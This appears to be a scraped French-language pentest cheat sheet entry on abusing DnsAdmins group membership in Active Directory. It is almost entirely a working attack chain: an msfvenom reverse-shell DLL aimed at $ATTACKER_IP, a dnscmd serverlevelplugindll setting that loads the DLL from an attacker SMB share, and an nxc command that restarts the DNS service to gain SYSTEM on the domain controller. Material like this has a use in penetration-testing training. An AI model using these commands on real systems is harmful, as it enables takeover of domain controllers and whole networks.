Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'DnsAdmins'Description: Vérifier l'appartenance au groupe DnsAdmins : donne le droit de charger une DLL dans le service DNS.
Exploitation
Charger une DLL arbitraire dans le service DNS via les droits DnsAdmins pour SYSTEM sur le DC.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'DnsAdmins'Description: Vérifier l'appartenance au groupe DnsAdmins : donne le droit de charger une DLL dans le service DNS.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$PORT -f dll -o evil.dllDescription: Générer une DLL malveillante à charger dans le service DNS (tourne en SYSTEM sur le DC).
dnscmd $DC /config /serverlevelplugindll \\$ATTACKER_IP\share\evil.dllDescription: Configurer le plugin DLL du service DNS : la DLL sera chargée au prochain redémarrage du service.
nxc smb $DC -u $USER -p $PASS -x 'sc stop dns && sc start dns'Description: Redémarrer le service DNS pour déclencher le chargement de la DLL malveillante.
nxc smb $DC -u $USER -p $PASS -x 'reg query HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll'Description: Vérifier que le plugin est bien configuré avant de redémarrer le service.